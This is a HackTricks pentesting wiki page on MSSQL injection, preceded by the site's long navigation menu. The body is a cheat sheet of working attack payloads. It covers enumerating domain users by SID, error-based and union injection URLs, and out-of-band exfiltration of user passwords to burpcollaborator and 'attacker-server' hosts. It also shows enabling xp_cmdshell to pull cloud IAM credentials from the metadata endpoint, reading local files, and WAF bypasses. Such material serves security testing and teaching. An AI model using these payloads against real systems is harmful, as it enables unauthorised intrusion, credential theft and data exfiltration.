HackTricks
Search…
HackTricks
👾
Welcome!
HackTricks
About the author
Getting Started in Hacking
🤩
Generic Methodologies & Resources
Pentesting Methodology
External Recon Methodology
Pentesting Network
Pentesting Wifi
Phishing Methodology
Basic Forensic Methodology
Brute Force - CheatSheet
Python Sandbox Escape & Pyscript
Exfiltration
Tunneling and Port Forwarding
Search Exploits
Shells (Linux, Windows, MSFVenom)
🐧
Linux Hardening
Checklist - Linux Privilege Escalation
Linux Privilege Escalation
Useful Linux Commands
Bypass Linux Shell Restrictions
Linux Environment Variables
Linux Post-Exploitation
🍏
MacOS Hardening
MacOS Security & Privilege Escalation
🪟
Windows Hardening
Checklist - Local Windows Privilege Escalation
Windows Local Privilege Escalation
Active Directory Methodology
NTLM
Lateral Movement
Authentication, Credentials, UAC and EFS
Stealing Credentials
Basic CMD for Pentesters
Basic PowerShell for Pentesters
AV Bypass
📱
Mobile Pentesting
Android APK Checklist
Android Applications Pentesting
iOS Pentesting Checklist
iOS Pentesting
👽
Network Services Pentesting
Pentesting JDWP - Java Debug Wire Protocol
Pentesting Printers
Pentesting SAP
Pentesting Remote GdbServer
7/tcp/udp - Pentesting Echo
21 - Pentesting FTP
22 - Pentesting SSH/SFTP
23 - Pentesting Telnet
25,465,587 - Pentesting SMTP/s
43 - Pentesting WHOIS
53 - Pentesting DNS
69/UDP TFTP/Bittorrent-tracker
79 - Pentesting Finger
80,443 - Pentesting Web Methodology
88tcp/udp - Pentesting Kerberos
110,995 - Pentesting POP
111/TCP/UDP - Pentesting Portmapper
113 - Pentesting Ident
123/udp - Pentesting NTP
135, 593 - Pentesting MSRPC
137,138,139 - Pentesting NetBios
139,445 - Pentesting SMB
143,993 - Pentesting IMAP
161,162,10161,10162/udp - Pentesting SNMP
194,6667,6660-7000 - Pentesting IRC
264 - Pentesting Check Point FireWall-1
389, 636, 3268, 3269 - Pentesting LDAP
500/udp - Pentesting IPsec/IKE VPN
502 - Pentesting Modbus
512 - Pentesting Rexec
513 - Pentesting Rlogin
514 - Pentesting Rsh
515 - Pentesting Line Printer Daemon (LPD)
548 - Pentesting Apple Filing Protocol (AFP)
554,8554 - Pentesting RTSP
623/UDP/TCP - IPMI
631 - Internet Printing Protocol(IPP)
873 - Pentesting Rsync
1026 - Pentesting Rusersd
1080 - Pentesting Socks
1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
1433 - Pentesting MSSQL - Microsoft SQL Server
1521,1522-1529 - Pentesting Oracle TNS Listener
1723 - Pentesting PPTP
1883 - Pentesting MQTT (Mosquitto)
2049 - Pentesting NFS Service
2301,2381 - Pentesting Compaq/HP Insight Manager
2375, 2376 Pentesting Docker
3128 - Pentesting Squid
3260 - Pentesting ISCSI
3299 - Pentesting SAPRouter
3306 - Pentesting Mysql
3389 - Pentesting RDP
3632 - Pentesting distcc
3690 - Pentesting Subversion (svn server)
3702/UDP - Pentesting WS-Discovery
4369 - Pentesting Erlang Port Mapper Daemon (epmd)
5000 - Pentesting Docker Registry
5353/UDP Multicast DNS (mDNS) and DNS-SD
5432,5433 - Pentesting Postgresql
5555 - Android Debug Bridge
5601 - Pentesting Kibana
5671,5672 - Pentesting AMQP
5800,5801,5900,5901 - Pentesting VNC
5984,6984 - Pentesting CouchDB
5985,5986 - Pentesting WinRM
5985,5986 - Pentesting OMI
6000 - Pentesting X11
6379 - Pentesting Redis
8009 - Pentesting Apache JServ Protocol (AJP)
8086 - Pentesting InfluxDB
8089 - Pentesting Splunkd
8333,18333,38333,18444 - Pentesting Bitcoin
9000 - Pentesting FastCGI
9001 - Pentesting HSQLDB
9042/9160 - Pentesting Cassandra
9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream)
9200 - Pentesting Elasticsearch
10000 - Pentesting Network Data Management Protocol (ndmp)
11211 - Pentesting Memcache
15672 - Pentesting RabbitMQ Management
24007,24008,24009,49152 - Pentesting GlusterFS
27017,27018 - Pentesting MongoDB
44134 - Pentesting Tiller (Helm)
44818/UDP/TCP - Pentesting EthernetIP
47808/udp - Pentesting BACNet
50030,50060,50070,50075,50090 - Pentesting Hadoop
🕸
Pentesting Web
Web Vulnerabilities Methodology
Reflecting Techniques - PoCs and Polygloths CheatSheet
2FA/OTP Bypass
Bypass Payment Process
Captcha Bypass
Cache Poisoning and Cache Deception
Clickjacking
Client Side Template Injection (CSTI)
Command Injection
Content Security Policy (CSP) Bypass
Cookies Hacking
CORS - Misconfigurations & Bypass
CRLF (%0D%0A) Injection
Cross-site WebSocket hijacking (CSWSH)
CSRF (Cross Site Request Forgery)
Dangling Markup - HTML scriptless injection
Deserialization
Domain/Subdomain takeover
Email Injections
File Inclusion/Path traversal
File Upload
Formula/Doc/LaTeX Injection
HTTP Request Smuggling / HTTP Desync Attack
HTTP Response Smuggling / Desync
Upgrade Header Smuggling
hop-by-hop headers
IDOR
JWT Vulnerabilities (Json Web Tokens)
LDAP Injection
Login Bypass
NoSQL injection
OAuth to Account takeover
Open Redirect
Parameter Pollution
PostMessage Vulnerabilities
Race Condition
Rate Limit Bypass
Registration & Takeover Vulnerabilities
Regular expression Denial of Service - ReDoS
Reset/Forgotten Password Bypass
SAML Attacks
Server Side Inclusion/Edge Side Inclusion Injection
SQL Injection
MSSQL Injection
Oracle injection
PostgreSQL injection
MySQL injection
SQLMap - Cheetsheat
SSRF (Server Side Request Forgery)
SSTI (Server Side Template Injection)
Reverse Tab Nabbing
Unicode Normalization vulnerability
Web Tool - WFuzz
XPATH injection
XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
XXE - XEE - XML External Entity
XSS (Cross Site Scripting)
XSSI (Cross-Site Script Inclusion)
XS-Search
Cloud Security
GCP Security
Workspace Security
Github Security
Gitea Security
Kubernetes Security
Concourse
CircleCI
Jenkins
Apache Airflow
Atlantis
Cloud Security Review
AWS Security
😎
Hardware/Physical Access
Physical Attacks
Escaping from KIOSKs
Firmware Analysis
🦅
Reversing & Exploiting
Reversing Tools & Basic Methods
Common API used in Malware
Word Macros
Linux Exploiting (Basic) (SPA)
Exploiting Tools
Windows Exploiting (Basic Guide - OSCP lvl)
🔮
Crypto & Stego
Cryptographic/Compression Algorithms
Certificates
Cipher Block Chaining CBC-MAC
Crypto CTFs Tricks
Electronic Code Book (ECB)
Hash Length Extension Attack
Padding Oracle
RC4 - Encrypt&Decrypt
Stego Tricks
Esoteric languages
Blockchain & Crypto Currencies
🧐
External Platforms Reviews/Writeups
BRA.I.NSMASHER Presentation
INE Courses and eLearnSecurity Certifications Reviews
🦂
C2
Merlin
Empire
Salseo
ICMPsh
Cobalt Strike
TODO
Other Big References
Rust Basics
More Tools
MISC
Pentesting DNS
Hardware Hacking
Radio Hacking
Burp Suite
Other Web Tricks
Interesting HTTP
Emails Vulnerabilities
Android Forensics
TR-069
6881/udp - Pentesting BitTorrent
CTF Write-ups
1911 - Pentesting fox
Online Platforms with API
Stealing Sensitive Information Disclosure from a Web
Post Exploitation
Powered By GitBook
MSSQL Injection
Support HackTricks and get benefits!

Active Directory enumeration

It may be possible to enumerate domain users via SQL injection inside a MSSQL server using the following MSSQL functions:
  • master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator')): If you know the name of the domain (MEGACORP in this example) this function will return the SID of the user Administrator in hex format. This will look like 0x01050000000[...]0000f401, note how the last 4 bytes are the number 500 in big endian format, which is the common ID of the user administrator. This function will allow you to know the ID of the domain (all the bytes except of the last 4).
  • SUSER_SNAME(0x01050000000[...]0000e803) : This function will return the username of the ID indicated (if any), in this case 0000e803 in big endian == 1000 (usually this is the ID of the first regular user ID created). Then you can imagine that you can bruteforce user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
def get_sid(n):
domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
user = struct.pack('<I', int(n))
user = user.hex()
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000

Alternative Error-Based vectors

(From here) Error-based SQL injections typically resemble constructions such as «[email protected]@version–» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.
Some examples of such functions:
  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()
Example use of function USER_NAME():
https://vuln.app/getItem?id=1'%2buser_name(@@version)--

SSRF

fn_trace_gettabe, fn_xe_file_target_read_file, fn_get_audit_file (from here)

fn_xe_file_target_read_file() example:
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
Permissions: Requires VIEW SERVER STATE permission on the server.
fn_get_audit_file() example:
https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
Permissions: Requires the CONTROL SERVER permission.
fn_trace_gettable() example:
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
Permissions: Requires the CONTROL SERVER permission.
One technique that keeps coming up is the usage of the undocumented stored procedure xp_dirtree that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests.
If you are able to execute operating system commands, then you could invoke Powershell to make a curl (Invoke-WebRequest) request. You could do this via the hacker favorite xp_cmdshell as well.
Alternatively, you could also use a User Defined Function in MSSQL to load a DLL and use the dll to make the request from inside MSSQL directly.
Let’s look at the above techniques in a little more detail.

Limited SSRF using master..xp_dirtree (and other file stored procedures)

The most common method to make a network call you will come across using MSSQL is the usage of the Stored Procedure xp_dirtree, which weirdly is undocumented by Microsoft, which caused it to be documented by other folks on the Internet. This method has been used in multiple examples of Out of Band Data exfiltration posts on the Internet.
Essentially,
DECLARE @user varchar(100);
SELECT @user = (SELECT user);
EXEC ('master..xp_dirtree "\\'[email protected]+'.attacker-server\aa"');
Much like MySQL’s LOAD_FILE, you can use xp_dirtree to make a network request to only TCP port 445. You cannot control the port number, but can read information from network shares. Addtionally, much like any UNC path access, Windows hashes will be sent over to the network that can be captured and replayed for further exploitation.
PS: This does not work on Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) running on a Windows Server 2016 Datacenter in the default config.
There are other stored procedures like master..xp_fileexist etc. as well that can be used for similar results.

master..xp_cmdshell

The extended stored procedure xp_cmdshell spawns a Windows command shell and executes the string passed to it, returning any rows of text. This command is run as the SQL Server service account.
xp_cmdshell is disabled by default. You can enable it using the SQL Server Configuration Option. Here’s how
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
GO
exec master..xp_cmdshell 'whoami'
GO
You could use something like PowerCat, download the Windows port of netcat/ncat, use raw TCP Client for arbitrary ports, or simply invoke Powershell’s Invoke-WebRequest to make HTTP requests to perform Server Side queries.
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
exec ('master..xp_cmdshell ''powershell -exec -bypass -c ""(iwr '[email protected]+').Content""''');
GO
You can additionally pass other headers and change the HTTP method as well to access data on services that need a POST or PUT instead of a GET like in the case of IMDSv2 for AWS or a special header like Metadata: true in the case of Azure or the Metadata-Flavor: Google for GCP.

MSSQL User Defined Function - SQLHttp

It is fairly straightforward to write a CLR UDF (Common Language Runtime User Defined Function - code written with any of the .NET languages and compiled into a DLL) and load it within MSSQL for custom functions. This, however, requires dbo access so may not work unless the web application connection to the database as sa or an Administrator role.
This Github repo has the Visual Studio project and the installation instructions to load the binary into MSSQL as a CLR assembly and then invoke HTTP GET requests from within MSSQL.
using System.Data.SqlTypes;
using System.Net;
public partial class UserDefinedFunctions
{
[Microsoft.SqlServer.Server.SqlFunction]
public static SqlString http(SqlString url)
{
var wc = new WebClient();
var html = wc.DownloadString(url.Value);
return new SqlString (html);
}
}
In the installation instructions, run the following before the CREATE ASSEMBLY query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using select * from sys.trusted_assemblies;)
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
Once the assembly is added and the function created, we can run the following to make our HTTP requests
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);

Quick exploitation: Retrieve an entire table in one query

(From here) There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it.
The query to retrieve the schema, tables and columns from the current database:
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON.
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

Reading local files

(From here) An example of retrieving a local file C:\Windows\win.ini using the function OpenRowset():
https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null
Error-based vector:
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

Retrieving the current query

(From here) The current SQL query being executed can be retrieved from access sys.dm_exec_requests and sys.dm_exec_sql_text:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
Permissions: If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.

Little tricks for WAF bypasses

(From here) Non-standard whitespace characters: %C2%85 или %C2%A0:
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--
Scientific (0e) and hex (0x) notation for obfuscating UNION:
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
https://vuln.app/getItem?id=0xunion+select+null,@@version,null--
A period instead of a whitespace between FROM and a column name:
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
\N seperator between SELECT and a throwaway column:
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
Support HackTricks and get benefits!
Pentesting Web - Previous
SQL Injection
Next
Oracle injection
Last modified 3mo ago
Copy link
Outline
Active Directory enumeration
Alternative Error-Based vectors
SSRF
Quick exploitation: Retrieve an entire table in one query
Reading local files
Retrieving the current query
Little tricks for WAF bypasses